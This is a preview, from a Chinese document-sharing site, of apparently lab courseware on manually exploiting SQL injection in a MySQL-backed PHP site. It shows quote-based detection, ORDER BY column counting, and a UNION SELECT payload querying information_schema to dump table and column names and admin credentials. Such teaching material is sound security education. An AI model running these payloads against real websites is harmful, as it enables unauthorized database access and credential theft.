- 1、本文档共20页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
SQL注入与防范
——手工注入mysql数据库
1 任务场景
目录 2 任务分析
CONTENTS 3 预备知识
4 实验步骤
5 总结思考
01 任务场景
任务场景
• 小李接到上级通知,一家客户公司的网站可能存在注入漏洞,现在需要对客户的网站进行测试,确
认是否真的存在注入漏洞。
02 任务分析
任务分析
• 在不确定是否存在注入点的情况下,可以使用手工注入的方式检验注入点的存在与否,实现注入点
的查找,网站数据库的分析,数据库内容的读取。
03 预备知识
预备知识
• SQL注入,是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,
最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意
的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)
SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语
句。
04 实验步骤
实验步骤
打开网络拓扑,点击启动选项,启动实验虚拟机使用ifconfig或ipconfig命令分别获取渗透机和靶机的IP地址,
使用ping命令进行网络连通性测试,确保主机间网络的连通性确认渗透机ip地址,确认靶机ip地址
实验步骤
访问01/list.php?id=1
在id=1后加入引号再次访问,即01/list.php?id=1’,发现报错,说明此处存在注入点
实验步骤
确认注入点后,判断当前网站使用的数据库,由于网站使用的是php脚本,
初步判断网站使用的是mysql数据库,使用mysql数据库语法进行验证
通过order by 判断当前表的字段数,当order n返回正确页面而order by n+1 返回错误页面,
则说明当前表的字段数为n个。判断当前表的字段数目的是为了后面使用union select 联合查询语法
实验步骤
http:// 01/list.php?id=1 order by 5
使用union select联合查询语句获取显示位
实验步骤
通过information_schema这个库中的tables表读取所有的表名
01/list.php?id=1 and 1=2 union select 1,group_concat(table_name),3,4
from information_schema.tables where table_schema=database()
选取之前获得的表admin ,通过information_schema库中的columns表读取admin表中的所有字段名
实验步骤
选取之前获得的字段名,读取字段内容
通过在线解密网站解出test账户的密码为admin
实验步骤
root账户的密码为root
您可能关注的文档
- 走进数字媒体 课件 项目二 分镜头脚本创作 任务一《天鹅泡芙的制作》任务二 电视广告片《文明,你会在哪里?》任务三 微视频《踏出梦想》.pptx
- 走进数字媒体 课件 项目六 定格动画 任务一 拍摄前期准备、任务二 定格拍摄、任务三 动画剪辑.pptx
- 走进数字媒体 课件 项目三 摄影技术 任务一 摄影器材、任务二 摄影技巧、任务三 布光技术.pptx
- 走进数字媒体 课件 项目四 素材处理 任务一《快乐童年》任务二 音频素材处理任务三 视频素材处理.pptx
- 走进数字媒体 课件 项目五 后期制作 任务一《天鹅泡芙的制作》任务二《时尚芭莎》任务三《美丽西藏》.pptx
- 走进数字媒体 课件 项目一 视觉美感设计 任务一《凉鞋广告》任务二 《工作证》《手机QQ登录界面》.pptx
- 数据库安全——SQL注入与防范——使用sqlmap注入mysql数据库.pdf
- 数据库安全——SQL注入与防范——手工注入access数据库.pdf
- 数据库安全——SQL注入与防范——手工注入mssql数据库.pdf
- 数据库安全——SQL注入与防范——手工注入Oracle数据库.pdf
- 浙江金华市公共资源交易中心永康市分中心编外人员招考聘用笔试历年典型考题及考点研判与答案详解.docx
- 浙江宁波慈溪市政协办公室招考聘用编外工作人员笔试历年典型考题及考点研判与答案详解.docx
- 浙江金华永康市西溪镇人民政府招考聘用笔试历年典型考题及考点研判与答案详解.docx
- 福建南平市公安局建阳分局招考聘用辅警笔试历年典型考题及考点研判与答案详解.docx
- 浙江嘉兴海盐县武原街道基层残疾人工作专职委员(公益岗位)招考聘用笔试历年典型考题及考点研判与答案详解.docx
- 浙江宁波知识产权保护中心招考聘用工作人员笔试历年典型考题及考点研判与答案详解.docx
- 浙江杭州建德市面向2024届普通高校毕业生招考聘用教师(第二批)16人笔试历年典型考题及考点研判与答案详解.docx
- 浙江省台州中学面向2024届普通高校毕业生招考聘用教师12人笔试历年典型考题及考点研判与答案详解.docx
- 湖北师范大学体育学院专任教师招考聘用笔试历年典型考题及考点研判与答案详解.docx
- 重庆市南岸区教育事业单位面向2024届高校毕业生招考聘用114人笔试历年典型考题及考点研判与答案详解.docx
文档评论(0)